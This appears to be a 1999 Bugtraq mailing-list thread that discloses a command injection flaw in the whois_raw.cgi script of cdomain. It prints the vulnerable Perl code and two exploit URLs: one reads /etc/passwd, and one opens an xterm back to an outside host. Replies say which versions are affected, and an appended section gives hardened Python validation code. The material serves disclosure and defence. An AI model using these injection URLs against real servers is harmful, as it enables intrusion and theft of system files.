Date: Tue, 1 Jun 1999 00:34:51 +0200
From: Salvatore Sanfilippo -antirez-
To: BUGTRAQ@netspace.org
Subject: whois_raw.cgi problem

Hi,

sorry if this has already been known.

There is a problem in whois_raw.cgi, called from
whois.cgi. whois_raw.cgi is part of cdomain v1.0.
I don't know if new versions are vulnerable.

    #!/usr/bin/perl
    #
    # whois_raw.cgi Written by J. Allen Hatch (zone@berkshire.net)
    # 04/17/97
    #
    # This script is part of the cdomain v1.0 package which is available at:
    # http://www.your-site.com/~zone/whois.html
    ...
    require ("/usr/lib/perl5/cgi-lib.pl");
    ...
    $fqdn = $in{'fqdn'};    # Fetch the root name and concatenate
                            # (user-supplied CGI value, used below without any
                            #  filtering or quoting)

    # Fire off whois
    if ($in{'root'} eq "it") {
        # Backticks hand the whole string to /bin/sh, so shell metacharacters
        # in $fqdn (a newline in particular) are interpreted by the shell.
        @result=`$whois_cmd_it $fqdn`;
    } elsif ($in{'fqdn'} eq "alicom.com" || $in{'fqdn'} eq "alicom.org") {
        @result="Dettagli non disponibili per il dominio richiesto.";
    } else {
        @result=`$whois_cmd $fqdn`;
    }
    ...

The exploit is a banal and well-known problem:

http://www.victim.com/cgi-bin/whois_raw.cgi?fqdn=%0Acat%20/etc/passwd
http://www.victim.com/cgi-bin/whois_raw.cgi?fqdn=%0A/usr/X11R6/bin/xterm%20-display%20graziella.lame.org:0

bye,
antirez

--
Salvatore Sanfilippo
antirez | md5330@mclink.it | antirez@alicom.com
try hping: http://www.kyuzz.org/antirez
antirez@seclab.com
'se la barca non ce l'hai dove uzba te ne vai?
 se la barca te la ruba, preo.' (M. Abruscato & O. Carmeci)

---------------------------------------------------------------------------------

Date: Wed, 2 Jun 1999 00:16:42 +0200
From: Peter van Dijk
To: BUGTRAQ@netspace.org
Subject: Re: whois_raw.cgi problem

On Tue, Jun 01, 1999 at 12:34:51AM +0200, Salvatore Sanfilippo -antirez- wrote:
> Hi,
>
> sorry if this has already been known.
>
> There is a problem in whois_raw.cgi, called from
> whois.cgi. whois_raw.cgi is part of cdomain v1.0.
> I don't know if new versions are vulnerable.

Version 2.0 is just as vulnerable.
The commercial version (the one that runs on NT too :) is _not_ vulnerable
since it does its own socket thing instead of starting 'whois'.

I've known of this bug in cdomain for about 6 months but never got around
to writing up an advisory...

Greetz, Peter
--
| 'He broke my heart,  | Peter van Dijk                              |
| I broke his neck'    | peter@attic.vuurwerk.nl                     |
| nognikz - As the sun | Hardbeat@ircnet - #cistron/#linux.nl        |
|                      | Hardbeat@undernet - #groningen/#kinkfm/#vdh |

---------------------------------------------------------------------------------

Date: Wed, 2 Jun 1999 01:06:22 +0200
From: Peter van Dijk
To: BUGTRAQ@netspace.org
Subject: Re: whois_raw.cgi problem

On Wed, Jun 02, 1999 at 12:16:42AM +0200, Peter van Dijk wrote:
> On Tue, Jun 01, 1999 at 12:34:51AM +0200, Salvatore Sanfilippo -antirez- wrote:
> > Hi,
> >
> > sorry if this has already been known.
> >
> > There is a problem in whois_raw.cgi, called from
> > whois.cgi. whois_raw.cgi is part of cdomain v1.0.
> > I don't know if new versions are vulnerable.
>
> Version 2.0 is just as vulnerable.
>
> The commercial version (the one that runs on NT too :) is _not_ vulnerable
> since it does its own socket thing instead of starting 'whois'.
>
> I've known of this bug in cdomain for about 6 months but never got around
> to writing up an advisory...

To elaborate on this a bit further:

cdomain-free 2.4 and lower are _vulnerable_.

cdomain-free 2.5 and all commercial cdomain versions I've seen are _not_
vulnerable, because they connect to the whois servers themselves.

cdomain-free is available for download at www.cdomain.com.

Greetz, Peter
--
| 'He broke my heart,  | Peter van Dijk                              |
| I broke his neck'    | peter@attic.vuurwerk.nl                     |
| nognikz - As the sun | Hardbeat@ircnet - #cistron/#linux.nl        |
|                      | Hardbeat@undernet - #groningen/#kinkfm/#vdh |
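The root cause in the thread above is the Perl backtick call `$whois_cmd $fqdn`, which hands a raw CGI parameter to /bin/sh, so a `%0A` (newline) in `fqdn` terminates the whois command and starts a second one. The following Python is an added example written for this archive page; it is not code from the posts or from the cdomain package. It shows the two defences a maintainer would apply to such a script: a strict hostname validator that only admits `[A-Za-z0-9.-]` in well-formed labels, and an argv-list exec that never involves a shell. The command paths in `WHOIS_COMMANDS` and the `.it` whois server are assumed placeholders standing in for the script's `$whois_cmd` and `$whois_cmd_it`; the posts do not show their real values.

```python
# Added example, not from the original post or the cdomain package: a hardened
# version of the whois_raw.cgi lookup path.  Two defences replace the backtick
# call `$whois_cmd $fqdn`: a strict hostname validator and an argv-list exec
# that never passes user input to /bin/sh.
import re
import shlex
import subprocess
from typing import Optional

# One DNS label: 1-63 letters, digits or hyphens, not starting or ending with '-'.
_LABEL = r"(?!-)[A-Za-z0-9-]{1,63}(?<!-)"
# Two or more labels joined by dots; the overall length is checked separately.
_FQDN_RE = re.compile(rf"{_LABEL}(?:\.{_LABEL})+")

# Registry-specific lookup commands, mirroring $whois_cmd / $whois_cmd_it in the
# script.  Paths and server are assumed placeholders (the posts did not show the
# real values).  They are operator-controlled constants, so splitting them with
# shlex is safe; user input is never mixed into these strings.
WHOIS_COMMANDS = {
    "default": "/usr/bin/whois",
    "it": "/usr/bin/whois -h whois.nic.it",
}


def validate_fqdn(raw: str) -> Optional[str]:
    """Return the lower-cased hostname, or None if the input is not one.

    Everything a shell could interpret (newline, space, ';', '|', '`', '$',
    quotes) is rejected simply because the allowed alphabet is [A-Za-z0-9.-].
    re.fullmatch (rather than re.match with '$') ensures a trailing newline
    is not silently accepted.
    """
    if not isinstance(raw, str) or not 1 <= len(raw) <= 253:
        return None
    if _FQDN_RE.fullmatch(raw) is None:
        return None
    return raw.lower()


def build_whois_argv(fqdn: str, root: str) -> list[str]:
    """Build the argv list for the lookup; raise ValueError on bad input."""
    name = validate_fqdn(fqdn)
    if name is None:
        raise ValueError("fqdn is not a valid domain name")
    command = WHOIS_COMMANDS["it" if root == "it" else "default"]
    # The validated name is appended as a single argv element: no shell is
    # started, so no word splitting or command separation can occur.
    return shlex.split(command) + [name]


def run_whois(fqdn: str, root: str, timeout: float = 20.0) -> str:
    """Run the lookup without a shell and return its stdout (needs network)."""
    argv = build_whois_argv(fqdn, root)
    proc = subprocess.run(argv, capture_output=True, text=True,
                          timeout=timeout, check=False)
    return proc.stdout


def shell_interpolation_demo(fqdn: str) -> str:
    """Show why the original pattern fails, using only the inert command 'echo'.

    shell=True mirrors Perl backticks: the whole string goes to /bin/sh -c, so
    a newline inside `fqdn` starts a second command.  Nothing but echo runs.
    """
    proc = subprocess.run(f"echo {fqdn}", shell=True,
                          capture_output=True, text=True)
    return proc.stdout


if __name__ == "__main__":
    # A newline-prefixed value (the %0A shape from the advisory, with echo as a
    # harmless stand-in) produces a second output line from the injected echo.
    print(repr(shell_interpolation_demo("\necho INJECTED")))
    # The same shape never reaches a shell in the hardened path.
    for candidate in ("alicom.com", "\ncat /etc/passwd", "-bad.example.com"):
        print(repr(candidate), "->", validate_fqdn(candidate))
    print(build_whois_argv("Example.IT", "it"))
```

In Perl the equivalent fix is the list form of `open(my $fh, '-|', $whois_cmd, $fqdn)` or `system(@argv)` with more than one element, both of which bypass the shell, combined with the same whitelist check on `$in{'fqdn'}` before the call. Validating first also keeps argument-injection at bay: a name starting with `-` is rejected, so it can never be parsed as a whois option.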